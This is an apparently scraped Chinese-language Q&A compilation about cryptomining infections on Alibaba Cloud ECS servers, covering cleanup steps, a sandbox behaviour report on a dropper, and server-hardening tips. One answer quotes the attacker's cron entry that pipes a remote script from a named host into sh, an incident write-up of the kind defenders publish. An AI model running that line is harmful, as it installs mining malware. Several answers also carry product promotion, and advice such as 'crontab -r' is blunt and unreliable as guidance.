阿里雲ecs挖礦木馬
A. 阿里雲windows伺服器中了挖礦的病毒怎麼清理
光刪除沒用的,因為沒有解決好漏洞。
建議是重做系統,然後找護衛神給你做一下系統安全加固,把漏洞徹底堵住才有效果。
B. 阿里雲允許用雲主機挖礦嗎
VPS提供商一般都不允許雲主機進行挖礦,一旦發現就會被封禁,而且本來就對挖礦進行了限制,本身你就無法使用雲主機進行挖礦,而且性能也達不到挖礦的標准。
C. windows伺服器的挖礦進程怎麼關閉刪除
這種病毒騰訊安全提到過
可以去下載安裝一個騰訊御點
打開之後,使用裡面的病毒查殺功能,直接就可以查殺這種電腦病毒了
D. 為什麼我的阿里雲 ECS 資料庫密碼總被莫名篡改
伺服器安全這問題,很重要,之前伺服器被黑,管理員賬號也被篡改,遠程埠也
登陸不了了。,在網上搜索了一些伺服器安全設置以及防黑的文章,對著文章,我
一個一個的設置起來,費了好幾天的時間才設置完,原以為會防止伺服器再次被黑
,沒想到伺服器竟然癱瘓了,網站都打不開了,無奈對伺服器安全也是一竅不通,
損失真的很大,資料庫都損壞了,我哪個後悔啊。娘個咪的。最後還是讓機房把系
統重裝了。找了幾個做網站伺服器方面的朋友,咨詢了關於伺服器被黑的解決辦法
,他們建議找國內最有名的伺服器安全的安全公司來給做安全維護,找了sinesafe
,伺服器被黑的問題,才得以解決。
一路的走來,才知道,伺服器安全問題可不能小看了。經歷了才知道,伺服器安全
了給自己帶來的也是長遠的利益。 希望我的經歷能幫到樓主,幫助別人也是在幫
助我自己。
下面是一些關於安全方面的建議!
建站一段時間後總能聽得到什麼什麼網站被掛馬,什麼網站被黑。好像入侵掛馬似
乎是件很簡單的事情。其實,入侵不簡單,簡單的是你的網站的必要安全措施並未
做好。
一:掛馬預防措施:
1、建議用戶通過ftp來上傳、維護網頁,盡量不安裝asp的上傳程序。
2、定期對網站進行安全的檢測,具體可以利用網上一些工具,如sinesafe網站掛
馬檢測工具!
序,只要可以上傳文件的asp都要進行身份認證!
3、asp程序管理員的用戶名和密碼要有一定復雜性,不能過於簡單,還要注意定期
更換。
4、到正規網站下載asp程序,下載後要對其資料庫名稱和存放路徑進行修改,數據
庫文件名稱也要有一定復雜性。
5、要盡量保持程序是最新版本。
6、不要在網頁上加註後台管理程序登陸頁面的鏈接。
7、為防止程序有未知漏洞,可以在維護後刪除後台管理程序的登陸頁面,下次維
護時再通過ftp上傳即可。
8、要時常備份資料庫等重要文件。
9、日常要多維護,並注意空間中是否有來歷不明的asp文件。記住:一分汗水,換
一分安全!
10、一旦發現被入侵,除非自己能識別出所有木馬文件,否則要刪除所有文件。
11、對asp上傳程序的調用一定要進行身份認證,並只允許信任的人使用上傳程序
。這其中包括各種新聞發布、商城及論壇程
二:掛馬恢復措施:
1.修改帳號密碼
不管是商業或不是,初始密碼多半都是admin。因此你接到網站程序第一件事情就
是「修改帳號密碼」。帳號
密碼就不要在使用以前你習慣的,換點特別的。盡量將字母數字及符號一起。此外
密碼最好超過15位。尚若你使用
SQL的話應該使用特別點的帳號密碼,不要在使用什麼什麼admin之類,否則很容易
被入侵。
2.創建一個robots.txt
Robots能夠有效的防範利用搜索引擎竊取信息的駭客。
3.修改後台文件
第一步:修改後台里的驗證文件的名稱。
第二步:修改conn.asp,防止非法下載,也可對資料庫加密後在修改conn.asp。
第三步:修改ACESS資料庫名稱,越復雜越好,可以的話將數據所在目錄的換一下
。
4.限制登陸後台IP
此方法是最有效的,每位虛擬主機用戶應該都有個功能。你的IP不固定的話就麻煩
點每次改一下咯,安全第一嘛。
5.自定義404頁面及自定義傳送ASP錯誤信息
404能夠讓駭客批量查找你的後台一些重要文件及檢查網頁是否存在注入漏洞。
ASP錯誤嘛,可能會向不明來意者傳送對方想要的信息。
6.慎重選擇網站程序
注意一下網站程序是否本身存在漏洞,好壞你我心裡該有把秤。
7.謹慎上傳漏洞
據悉,上傳漏洞往往是最簡單也是最嚴重的,能夠讓黑客或駭客們輕松控制你的網
站。
可以禁止上傳或著限制上傳的文件類型。不懂的話可以找專業做網站安全的
sinesafe公司。
8. cookie 保護
登陸時盡量不要去訪問其他站點,以防止 cookie 泄密。切記退出時要點退出在關
閉所有瀏覽器。
9.目錄許可權
請管理員設置好一些重要的目錄許可權,防止非正常的訪問。如不要給上傳目錄執行
腳本許可權及不要給非上傳目錄給於寫入權。
10.自我測試
如今在網上黑客工具一籮筐,不防找一些來測試下你的網站是否OK。
11.例行維護
a.定期備份數據。最好每日備份一次,下載了備份文件後應該及時刪除主機上的備
份文件。
b.定期更改資料庫的名字及管理員帳密。
c.借WEB或FTP管理,查看所有目錄體積,最後修改時間以及文件數,檢查是文件是
否有異常,以及查看是否有異常的賬號。
E. 阿里雲ECS伺服器對外攻擊,怎麼解決
伺服器被黑了,保存數據,重做系統。伺服器
F. 阿里雲伺服器ECS CPU老是被一個程序占滿100%
是一個mc-serv生成的病毒文件,
風險簡述 高危
安裝windows自啟動項
運行信息 Windows XP SP3 + PDF11
可疑行為特徵
[-]安裝windows自啟動項(1)
[-]file
"C:\\WINDOWS\\win.ini"
進程樹
.exe
文件釋放
[+]libeay32.dll
[+]zlib1.dll
[+]libwinpthread-1.dll
[+]mscl.exe
[+]ssleay32.dll
[+]libcurl-4.dll
[+]__tmp_rar_sfx_access_check_35958766
行為細節
[-].exe(當前進程號:1984,父進程號:1060)(1630)
[+]系統函數調用
[+]進程函數調用
[+]注冊表函數調用
[+]文件函數調用
[+]其它函數調用
G. 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白
1. 關閉訪問挖礦伺服器的訪問
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
2. chmod -x minerd ,取消掉執行許可權, 在沒有找到根源前,千萬不要刪除 minerd,因為刪除了,過一回會自動有生成一個。
3. pkill minerd ,殺掉進程
4. service stop crond 或者 crontab -r 刪除所有的執行計劃
5. 執行top,查看了一會,沒有再發現minerd 進程了。
6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。
下載腳本的語句:
*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下,感興趣的可以研究下:
View Code
解決minerd並不是最終的目的,主要是要查找問題根源,我的伺服器問題出在了redis服務了,黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權,http://blog.jobbole.com/94518/然後就注入了病毒,下面是解決辦法和清除工作:
1. 修復 redis 的後門,
配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」,區分普通用戶和admin許可權,普通用戶將會被禁止運行某些命令,如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號
3. 查看你的用戶列表,是不是有你不認識的用戶添加進來。 如果有就刪除掉.
H. 阿里雲ECS伺服器CPU佔用較高時,該如何處理
這種情況可以考慮是被挖礦了,可以找到雲市場雲頂雲尋求幫助,一般這種情況會讓工程師進行排查找出問題所在,然後再進行修理,大概的時間一般是三天以內
I. 阿里雲ecs伺服器怎麼設置更安全
雲伺服器的安全安全設置主要有一下幾個比較重要的幾個方面:
1、首先是伺服器的用戶管理,很多的攻擊和破解,首先是針對於系統的遠程登錄,畢竟拿到登錄用戶之後就能進入系統進行操作,所以首先要做的就是禁止root超級用戶的遠程登錄。
2、把ssh的默認埠改為其他不常用的埠。你可能不知道我們的伺服器其實每天都在被很多的掃描工具在掃描著,尤其是對於Linux伺服器的ssh默認22埠,掃描工具掃描出22埠之後就可能會嘗試破解和登錄。把ssh的默認埠修改後可以減少被掃描和暴力登錄的概率。此外你還可以使用fail2ban等程序防止ssh被暴力破解,其原理是嘗試多少次登錄失敗之後就把那個IP給禁止登錄了。
3、SSH 改成使用密鑰登錄,這樣子就不必擔心暴力破解了,因為對方不可能有你的密鑰,比密碼登錄安全多了。
4、一定要定期檢查和升級你的網站程序以及相關組件,及時修復那些重大的已知漏洞。網上也有很多的爬蟲機器人每天在掃描著各式各樣的網站,嘗試找系統漏洞。即使你前面把伺服器用戶許可權管理、登錄防護都做得很好了,然而還是有可能在網站程序上被破解入侵。
5、另外如果雲伺服器上運行多個網站系統(博客+企業官網)。我推薦使用docker容器的方式隔離運行環境,將每個程序運行在一個單獨的容器里,這樣即使伺服器上其中的一個網站程序被破解入侵了,也會被限制在被入侵的容器內,不會影響到其他的容器,也不會影響到系統本身。